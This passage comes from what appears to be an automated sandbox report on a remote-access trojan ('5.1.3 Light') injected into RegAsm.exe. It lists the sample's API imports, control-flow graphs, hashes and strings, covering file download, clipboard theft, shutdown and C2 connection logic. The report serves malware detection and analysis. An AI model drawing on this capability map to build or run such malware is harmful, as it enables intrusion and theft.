                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415063
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,0040A1F2), ref: 00415074
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415077
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,0040A1F2), ref: 00415088
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041508B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,0040A1F2), ref: 0041509C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041509F
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,0040A1F2), ref: 004150AB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150AE
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,0040A1F2), ref: 004150BB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150BE
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,0040A1F2), ref: 004150C6
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150C9
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,0040A1F2), ref: 004150D1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150D4
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,0040A1F2), ref: 004150DC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                              • API String ID: 4236061018-3687161714
                                                                                              • Opcode ID: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
                                                                                              • Instruction ID: d3d602bbfd1a93ba908cf2750ad540eaaa7976be03134fdad1e537fc9d893f35
                                                                                              • Opcode Fuzzy Hash: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
                                                                                              • Instruction Fuzzy Hash: 1D41BBA0E9435876DA107BF25C4EE1F2D5CD965B9A3214937B804931A3E9FC850CCEAF
                                                                                              Function 0040F4A7 Relevance: 63.9, APIs: 31, Strings: 5, Instructions: 929COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 5 40f4a7-40f526 call 4021e0 SetEvent call 402028 call 402006 call 4021e0 * 2 call 414384 18 40f52c 5->18 19 40fa1e-40fa21 5->19 22 40f532-40f536 18->22 23 40fa07-40fa0e 18->23 20 410113-41011a 19->20 21 40fa27 19->21 24 410120 20->24 25 41042e-410434 20->25 28 40ff89-4100d9 call 4034cf * 3 call 402028 call 4034cf call 402028 call 4034cf call 40d8ed call 4034cf call 402028 call 403509 call 4034cf call 402028 call 403509 call 4034cf call 414225 call 407d1f call 4093b6 call 407d1f call 4093b6 call 4034ff * 6 call 4142e7 21->28 29 40fa2d-40fa33 21->29 26 4105d1-4105fa call 4034fa call 402091 * 2 22->26 30 40f53c 22->30 23->26 27 40fa14-40fa19 call 408649 23->27 35 4103e1-4103e8 24->35 36 410126-41012b 24->36 31 41043a-41043d 25->31 32 4105af-4105b1 25->32 27->26 540 4100e0-41010e call 402a91 call 406ae8 call 4018e7 call 402091 * 2 28->540 541 4100db 28->541 29->26 38 40fa39-40fa3b 29->38 39 40f543-40f673 GetTickCount call 414155 call 4140ad call 414155 call 41405d call 4142e7 call 4034cf call 4047c1 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 4018e7 call 402091 * 6 call 4034ff call 402091 * 2 call 4034cf call 402028 call 433426 30->39 40 40f6f8-40f6ff 30->40 41 410443-410446 31->41 42 4105a9-4105ad 31->42 84 4105b3-4105cb call 4034cf call 402028 call 433426 ShowWindow 32->84 50 4103ea-41040a call 415128 CreateThread 35->50 51 41040f-410429 ShowWindow SetForegroundWindow 35->51 46 410381-410387 36->46 47 410131 36->47 52 40fa60-40fa62 ExitProcess 38->52 53 40fa70-40fa76 38->53 54 40fb71-40fbf6 call 4034cf call 402028 call 433426 call 4034cf call 402028 call 4034cf call 402028 MessageBoxW call 4034cf call 414155 call 404779 * 2 38->54 55 40fa42-40fa5b call 4034cf call 402028 DeleteFileW 38->55 56 40fda4-40fdad OpenClipboard 38->56 57 40fb15-40fb6c call 40153a call 40170e call 402178 call 4018e7 call 401a3c call 401d0d 38->57 58 40fe06-40fe35 call 4034cf call 402020 call 4034cf call 402028 call 40cb60 38->58 59 40fd89-40fd92 OpenClipboard 38->59 60 40fd0a-40fd13 OpenClipboard 38->60 61 40fa7d-40fa82 call 408de1 38->61 62 40fbfd-40fc21 call 410d25 call 4034cf call 403f83 38->62 63 40fa8f-40fa95 38->63 528 40f675-40f681 call 401536 39->528 529 40f69b-40f6b3 call 4034cf call 403f83 39->529 45 40f6bc-40f6c1 call 401eff 40->45 82 410541-4105a7 call 406030 call 4034cf call 4021e0 call 4034cf call 4021e0 call 4034cf call 4021e0 call 404993 call 40603e 41->82 83 41044c-41044f 41->83 42->84 45->26 86 4103c4-4103df call 4034cf call 4021e0 call 410870 46->86 87 410389-41038c 46->87 72 410137-41013d 47->72 73 41032a-410349 call 4034cf call 403f83 47->73 50->26 51->26 68 40fa68-40fa6a Sleep 53->68 69 40fa78-410602 call 408817 53->69 54->62 55->26 56->26 79 40fdb3-40fe01 GetClipboardData GlobalLock GlobalUnlock CloseClipboard call 403509 call 4142e7 call 4018e7 56->79 57->26 58->26 59->26 76 40fd98 EmptyClipboard 59->76 60->26 88 40fd19-40fd87 EmptyClipboard call 4034cf call 402020 GlobalAlloc GlobalLock call 4034cf call 402020 call 4034cf call 402028 call 42f1e0 GlobalUnlock SetClipboardData 60->88 61->26 226 40fc23-40fc37 call 4034cf call 402028 call 433426 62->226 227 40fc39-40fc51 call 4034cf call 403f83 62->227 74 40fa87-40fa89 Sleep 63->74 75 40fa97-40faf3 call 4034cf call 402028 call 4034cf call 402028 call 40900f call 404c42 call 4034cf call 402028 URLDownloadToFileW 63->75 68->53 94 410231-4102f1 call 41069b call 4034cf call 402028 call 433426 call 410d80 call 407b3a call 4034cf call 4021e0 call 4034cf call 4021e0 call 4034cf call 402028 call 403509 call 4034cf call 402028 call 403509 call 4072e5 72->94 95 410143-410146 72->95 202 410362-410372 call 4034cf call 4021e0 73->202 203 41034b-410360 call 4034cf call 4021e0 73->203 74->63 254 4101fe-410207 call 4034ff 75->254 405 40faf9-40fb10 call 40659e call 408ad8 75->405 111 40fd9e CloseClipboard 76->111 79->254 82->26 100 410455-410458 83->100 101 410504-41053c call 4034cf call 402028 call 402178 call 402028 call 40d202 83->101 84->26 236 4103bc-4103bf 86->236 114 4103a1-4103b7 call 4034cf call 4021e0 call 404fd2 87->114 115 41038e-410391 87->115 88->111 493 4102f3-410314 call 407b4e call 407ac6 call 407ae7 94->493 494 410319-410325 call 407abb 94->494 120 41020c-41022c call 4034cf call 402028 call 433426 call 407a60 95->120 121 41014c-410150 95->121 124 4104df-4104ff call 4034cf call 402028 call 433426 call 4140d0 100->124 125 41045e-410461 100->125 101->26 111->56 114->236 115->26 138 410397-41039c call 413544 115->138 120->26 144 410193-4101f9 call 4034cf call 402028 StrToIntA call 4034cf call 402028 call 40900f call 404c42 call 4034cf call 414a52 call 404c42 call 414d7f 121->144 145 410152-410156 121->145 124->26 148 410463-410466 125->148 149 4104ba-4104da call 4034cf call 402028 call 433426 call 4140fc 125->149 138->26 144->254 145->26 171 41015c-410188 call 4034cf call 402028 call 4034cf call 402028 call 433426 SetWindowTextW 145->171 148->26 174 41046c-4104b5 call 401673 call 40170e call 4034cf call 4021e0 call 4018e7 call 40400d call 401a3c 148->174 149->26 171->144 174->26 312 410377-41037c call 4106ac 202->312 203->312 360 40fc9d-40fca5 ExitWindowsEx 226->360 334 40fc53-40fc6a call 4034cf call 402028 call 433426 227->334 335 40fc6c-40fc7f call 4034cf call 403f83 227->335 236->26 254->26 312->26 334->360 385 40fc81-40fc9a call 4034cf call 402028 call 433426 335->385 386 40fcaa-40fcdc LoadLibraryA GetProcAddress call 4034cf call 403f83 335->386 360->26 385->360 435 40fce2-40fcf9 call 4034cf call 403f83 386->435 436 40fcde-40fce0 386->436 405->254 435->26 463 40fcff-40fd01 435->463 444 40fd03-40fd05 436->444 444->26 463->444 493->494 494->26 537 40f683-40f684 call 401e12 528->537 538 40f68e-40f696 call 401d6f 528->538 529->26 548 40f6b9-40f6ba 529->548 546 40f689 537->546 538->26 540->254 541->540 546->26 548->45
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountEventTick
                                                                                              • String ID: }F$PowrProf.dll$SetSuspendState$X|F$hlight
                                                                                              • API String ID: 180926312-747135334
                                                                                              • Opcode ID: b4f8bfaa92a33b2d89df3b74cd57c86bda3881004be2d32180297903a6c6945e
                                                                                              • Instruction ID: 98c374b66c36bac6561f19394a83ab35c3f0051b20c4d30e97aa66e57c35150d
                                                                                              • Opcode Fuzzy Hash: b4f8bfaa92a33b2d89df3b74cd57c86bda3881004be2d32180297903a6c6945e
                                                                                              • Instruction Fuzzy Hash: B452D53161430067C615FB72CC5AAAE369A9F90709F00493FF646B71D2EEBC8A49C75E
                                                                                              Function 0040A6C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040CFD6: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
                                                                                                • Part of subcall function 0040CFD6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
                                                                                                • Part of subcall function 0040CFD6: RegCloseKey.KERNEL32(?), ref: 0040D01F
                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040A76B
                                                                                              • ExitProcess.KERNEL32 ref: 0040A7CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                              • String ID: 5.1.3 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$override
                                                                                              • API String ID: 2281282204-700099006
                                                                                              • Opcode ID: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
                                                                                              • Instruction ID: 240a189e5f2994f65e702c6cd8730735317bc8827ab5a1e8e31b0d69f5303e7b
                                                                                              • Opcode Fuzzy Hash: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
                                                                                              • Instruction Fuzzy Hash: BE21A161F1430067C6087A76494B92E3A69AB91719F40853EB501772CBEE7DCE09839F
                                                                                              Function 00413BCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                              • API String ID: 481472006-2430845779
                                                                                              • Opcode ID: 91a9ca61b4bd8fa15ee54d5cb2b0c468836249a7ad9f69523933237cdd10b5a1
                                                                                              • Instruction ID: c71449d0853176ac06c3336b483bb21f3570e9d7b28fb8d8682e76423a61a460
                                                                                              • Opcode Fuzzy Hash: 91a9ca61b4bd8fa15ee54d5cb2b0c468836249a7ad9f69523933237cdd10b5a1
                                                                                              • Instruction Fuzzy Hash: C91151725183055BC304FB75D8558ABB3E8AB94709F50093FFA8A920D1FF7CDA88C65A
                                                                                              Function 0042B1E6 Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,0042AE9F,00000034,00000000,?,?), ref: 0042B1FB
                                                                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,0042AE9F,00000034,00000000,?,?), ref: 0042B210
                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042AE9F,00000034,00000000,?,?), ref: 0042B222
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1815803762-0
                                                                                              • Opcode ID: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
                                                                                              • Instruction ID: ae164a0b830f0c37185ea5edcc456d824eb1b24de8e49cb4941b3ca088d84150
                                                                                              • Opcode Fuzzy Hash: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
                                                                                              • Instruction Fuzzy Hash: 40F0E535304320FAEB311F11BC08F5B3F58EB86769F600536F215D60E0D652840186AC
                                                                                              Function 00413CEA Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetComputerNameExW.KERNEL32(00000001,?,0040A4C5,76230F10), ref: 00413D07
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00413D1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Name$ComputerUser
                                                                                              • String ID:
                                                                                              • API String ID: 4229901323-0
                                                                                              • Opcode ID: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
                                                                                              • Instruction ID: a952002a6ad584f3fd3bec97d2cc9e930b8157fb69aa19e269c8ae3064c7d3f6
                                                                                              • Opcode Fuzzy Hash: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
                                                                                              • Instruction Fuzzy Hash: 7501FF7590011CABCB05EBD4DC45EDEBB7CAF44309F10017AB505B7191EEB46B8D8B99
                                                                                              Function 0040A7D3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0040EF02,00467C58,004685A8,00467C58,00000000,00467C58,00000000,00467C58,5.1.3 Light), ref: 0040A7E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
                                                                                              • Instruction ID: 246ef45fcc1c43f14e643255eb9989aa517e7b2afcbfdbb0636345a12660214f
                                                                                              • Opcode Fuzzy Hash: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
                                                                                              • Instruction Fuzzy Hash: 14D05B3074011D77D51496859C0EEAA779CD702755F000166BE04D72C0D9E05E0057D1
                                                                                              Function 00417621 Relevance: .6, Instructions: 585COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8e665746bd5c0bf0b0d6802195199d6372851c629bc290857f3118bdb54c3e49
                                                                                              • Instruction ID: 06fb409b2eb98aa264058a924fa4ce0d35fc76914ffdd7f9b1cda4f708cda101
                                                                                              • Opcode Fuzzy Hash: 8e665746bd5c0bf0b0d6802195199d6372851c629bc290857f3118bdb54c3e49
                                                                                              • Instruction Fuzzy Hash: 2422C131A082199BDF15DF68C4807FEB7B5AF44314F18416BEC55AB382DB389E85CB98
                                                                                              Function 0040E92F Relevance: 39.3, APIs: 4, Strings: 18, Instructions: 789sleepnetworkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 558 40e92f-40e977 call 4021c9 call 413e9d call 4021c9 call 4034cf call 402028 call 433426 571 40e986-40e9d2 call 402178 call 4034cf call 4021e0 call 414384 call 4016e4 call 4034cf call 410fbd 558->571 572 40e979-40e980 Sleep 558->572 587 40e9d4-40ea3e call 4034cf call 402020 call 4034cf call 402028 call 4034cf call 402020 call 4034cf call 402028 call 4034cf call 402020 call 4034cf call 402028 call 401585 571->587 588 40ea46-40eae1 call 402178 call 4034cf call 4021e0 call 414384 call 4034cf * 2 call 406ba2 call 404779 call 40209b call 402091 * 2 call 4034cf call 403f83 571->588 572->571 640 40ea43 587->640 641 40eaf1-40eaf8 588->641 642 40eae3-40eaef 588->642 640->588 643 40eafd-40eb8f call 403f1f call 402a91 call 404804 call 404779 call 402178 call 413bcc call 402091 * 2 call 4034cf call 402028 call 4034cf call 402028 call 40e8ee 641->643 642->643 670 40eb91-40ebd5 WSAGetLastError call 414e7e call 402a6d call 402178 call 413bcc call 402091 643->670 671 40ebda-40ebe8 call 401673 643->671 693 40f460-40f472 call 401c4f call 403583 670->693 676 40ec15-40ec2a call 401d6f call 40170e 671->676 677 40ebea-40ec10 call 402178 * 2 call 413bcc 671->677 676->693 694 40ec30-40ed8d call 4034cf * 2 call 402a91 call 404804 call 404779 call 404804 call 404779 call 402178 call 413bcc call 402091 * 4 call 413dcc call 40dfc6 call 403509 * 2 call 437a48 call 4034cf call 4021e0 call 402020 call 402028 * 2 call 40d18b 676->694 677->693 706 40f474-40f494 call 4034cf call 402028 call 433426 Sleep 693->706 707 40f49a-40f4a2 call 4034fa 693->707 760 40eda1-40edcb call 402028 call 40d033 694->760 761 40ed8f-40ed9c call 403f1f 694->761 706->707 707->588 767 40edd2-40f405 call 403509 call 409344 call 414209 call 4142e7 call 414155 call 4034cf GetTickCount call 414155 call 4140ad call 414155 call 41405d call 4142e7 * 5 call 40a7d3 call 4142e7 call 4047c1 call 406ae8 call 404779 call 406ae8 call 404779 * 3 call 406ae8 call 404779 call 404804 call 404779 call 404804 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 404804 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 404804 call 404779 * 5 call 406ae8 call 404779 call 406ae8 call 404779 * 7 call 406ae8 call 4018e7 call 402091 * 50 call 4034ff call 402091 * 5 call 4034ff call 401a3c 760->767 768 40edcd-40edcf 760->768 761->760 1009 40f40a-40f45b call 403ee2 call 402178 * 2 call 413bcc call 402091 * 2 call 4034ff * 2 767->1009 768->767 1009->693
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,00000029,00000000,76230F10,00467F30), ref: 0040E980
                                                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0040EB91
                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 0040F494
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                              • String ID: | $%I64u$5.1.3 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $X|F$X|F$\~F$\~F$\~F$hlight$name
                                                                                              • API String ID: 524882891-1162076392
                                                                                              • Opcode ID: 68ccaa8d0cf79c1436a0189e8d3e88be9f333b1599ce4cf3acb2c98d969ec9a9
                                                                                              • Instruction ID: b6ca194f84a5d1c98b5920ce75ddcdd8fe9fcf0a86d7d700392620a7e0496257
                                                                                              • Opcode Fuzzy Hash: 68ccaa8d0cf79c1436a0189e8d3e88be9f333b1599ce4cf3acb2c98d969ec9a9
                                                                                              • Instruction Fuzzy Hash: 5D52AD71A002145ACB19F732DD66AEEB3759F90308F5041BFB60A761D2EF781F88CA59
                                                                                              Function 0040A1D6 Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 328threadsleepfileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1026 40a1d6-40a24d call 414eed GetModuleFileNameW call 40a60c call 4021e0 * 2 call 414384 call 40a9e5 call 4034fa 1041 40a2a7-40a326 call 4034cf * 2 call 402a91 call 404804 call 40209b call 402091 * 2 call 4034cf call 402077 call 403f1f call 4087ef 1026->1041 1042 40a24f-40a253 1026->1042 1082 40a328-40a32a 1041->1082 1083 40a33f-40a346 1041->1083 1042->1041 1044 40a255-40a25b 1042->1044 1044->1041 1046 40a25d-40a2a2 call 40aa8b call 4034cf call 402028 call 40be14 call 40aa3c call 40a5f9 1044->1046 1072 40a32b-40a33c call 402091 1046->1072 1082->1072 1084 40a348 1083->1084 1085 40a34a-40a356 call 4139a6 1083->1085 1084->1085 1088 40a358-40a35a 1085->1088 1089 40a35f-40a3b5 call 4034cf call 414225 call 4064d4 call 4034ff call 4034cf * 4 call 402028 1085->1089 1088->1089 1109 40a3b7-40a3c7 call 4034cf call 402028 1089->1109 1110 40a41e-40a478 call 4034cf call 402028 call 402178 call 402028 call 40d202 call 4034cf call 402028 call 433426 1089->1110 1119 40a3ca-40a3d3 1109->1119 1144 40a47a-40a47c 1110->1144 1145 40a47e-40a480 1110->1145 1119->1119 1121 40a3d5-40a3d9 1119->1121 1121->1110 1123 40a3db-40a419 call 4034cf call 402028 call 4034cf call 402028 call 40900f call 4064d4 call 4034ff 1121->1123 1123->1110 1147 40a484-40a493 call 415128 CreateThread 1144->1147 1148 40a482 1145->1148 1149 40a495-40a4e0 call 402178 * 2 call 413bcc call 413cea call 4064d4 call 4034ff 1145->1149 1147->1149 1148->1147 1166 40a4e2-40a4e3 SetProcessDEPPolicy 1149->1166 1167 40a4e5-40a4f8 CreateThread 1149->1167 1166->1167 1168 40a506 1167->1168 1169 40a4fa-40a4fd 1167->1169 1172 40a50b-40a52f call 402178 call 402a6d call 402178 call 413bcc 1168->1172 1170 40a540-40a55b call 402028 call 40cf8c 1169->1170 1171 40a4ff-40a504 1169->1171 1182 40a561-40a598 call 414225 call 404c42 call 40d0a8 call 4034ff call 404c42 1170->1182 1183 40a5ee-40a5f8 call 4092fd call 40e92f 1170->1183 1171->1172 1191 40a534-40a53b call 402091 1172->1191 1202 40a5b1-40a5b6 DeleteFileW 1182->1202 1191->1170 1203 40a5b8-40a5e9 call 414225 call 404c42 call 40d444 call 4034ff * 2 1202->1203 1204 40a59a-40a59d 1202->1204 1203->1183 1204->1203 1205 40a59f-40a5ac Sleep call 404c42 1204->1205 1205->1202
                                                                                              APIs
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F09
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F27
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F3B
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F53
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F67
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F76
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F8A
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F9E
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FB2
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FC6
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FDA
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FEE
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415002
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415016
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415027
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040A1FF
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00015962,00000000,00000000,00000000), ref: 0040A493
